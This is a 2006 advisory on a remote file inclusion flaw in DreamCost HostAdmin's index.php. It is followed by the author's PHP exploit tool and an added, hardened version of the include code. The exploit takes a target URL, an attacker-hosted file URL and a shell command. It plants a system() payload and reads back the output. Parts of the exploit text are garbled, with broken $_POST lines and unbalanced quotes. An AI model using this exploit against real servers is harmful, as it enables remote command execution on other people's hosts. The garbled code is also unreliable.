
Host Admin


=======================================================================================

HostAdmin - Remote Command Execution Vulnerability

=======================================================================================

http://www.xorcrew.net/

http://www.xorcrew.net/ReZEN

=======================================================================================

:: Summary

Vendor : DreamCost

Vendor Site : http://www.dreamcost.com/

Product(s) : HostAdmin - Automated Hosting Suite

Version(s) : All

Severity : Medium/High

Impact : Remote Command Execution

Release Date : 2/11/2006

Credits : ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

By creating a product that integrates with the major payment processors, registrars,

and provisioning tools on the market, HostAdmin gives your hosting company the power

to bill and activate hosting accounts in real-time, even while you sleep at night!

=======================================================================================

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote command execution

in the index.php file. The bug is here on lines 5, 6, and 7:

require("setup.php");

require("functions.php");

require("db.conf");

require($path . "que.php");

require($path . "provisioning_manager.php");

require($path . "registrar_manager.php");

The $path variable is not set prior to being used in the require() function.

The vendor is no longer offering updates for this software.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php

/*

HostAdmin Remote File Inclusion Exploit c0ded by ReZEN

Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf

url: http://www.xorcrew.net/ReZEN

*/

$cmd = $_POST["cmd wrote: ;

$turl = $_POST["turl wrote: ;

$hurl = $_POST["hurl wrote: ;

$form= "<form method="post" action="".$PHP_SELF."">"

."turl:

<input type="text" name="turl" size="90" value="".$turl."">

"

."hurl:

<input type="text" name="hurl" size="90" value="".$hurl."">

"

."cmd:

<input type="text" name="cmd" size="90" value="".$cmd."">

"

."<input type="submit" value="Submit" name="submit">"

."</form><HR WIDTH="650" ALIGN="LEFT">";

if (!isset($_POST['submit']))

{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system("echo ++BEGIN++"); system("".$cmd."");

system("echo ++END++"); ?>");

fclose($file);

$file = fopen ($turl.$hurl, "r");

if (!$file) {

echo "

Unable to get output.n";

exit;

}

echo $form;

while (!feof ($file)) {

$line .= fgets ($file, 1024)."

";

}

$tpos1 = strpos($line, "++BEGIN++");

$tpos2 = strpos($line, "++END++");

$tpos1 = $tpos1+strlen("++BEGIN++");

$tpos2 = $tpos2-$tpos1;

$output = substr($line, $tpos1, $tpos2);

echo $output;

}

?>

------END------
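
A hardened form of the include sequence quoted in the synopsis, as an added example that is not part of the original advisory or the vendor's code: $path is initialised by the application before use, and each module is resolved through an allowlist and realpath() before require. The resolve_module() helper, the ALLOWED_MODULES constant and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example. Module file names are from the advisory; the helper,
// the constant and the demo directory are hypothetical.
const ALLOWED_MODULES = ['que.php', 'provisioning_manager.php', 'registrar_manager.php'];

// Resolve $name inside $baseDir to an absolute local path, or throw.
function resolve_module(string $baseDir, string $name): string
{
    if (!in_array($name, ALLOWED_MODULES, true)) {
        throw new RuntimeException("module not on allowlist: $name");
    }
    // realpath() only resolves local paths: it returns false for a URL
    // or a missing file, and it collapses any ../ segments.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("refusing to load $name from $baseDir");
    }
    return $full;
}

// Constructed demo: a temporary directory stands in for the install directory.
$demo = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'hostadmin_demo_' . getmypid();
mkdir($demo);
foreach (ALLOWED_MODULES as $m) {
    file_put_contents($demo . DIRECTORY_SEPARATOR . $m, "<?php // stub module\n");
}

// $path is set by the application before first use, so it cannot be
// supplied by request data (the flaw described in the synopsis).
$path = $demo . DIRECTORY_SEPARATOR;
foreach (ALLOWED_MODULES as $m) {
    require resolve_module($path, $m);
    echo "loaded $m\n";
}

// A request-supplied base or an unlisted name is rejected, not fetched.
foreach ([['http://example.invalid/', 'que.php'], [$path, '../setup.php']] as [$b, $n]) {
    try {
        resolve_module($b, $n);
        echo "UNEXPECTED: accepted $b$n\n";
    } catch (RuntimeException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}

// Remove the demo files.
array_map('unlink', glob($demo . DIRECTORY_SEPARATOR . '*.php'));
rmdir($demo);
```

Setting allow_url_include = Off in php.ini blocks remote targets for require() as a second layer.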
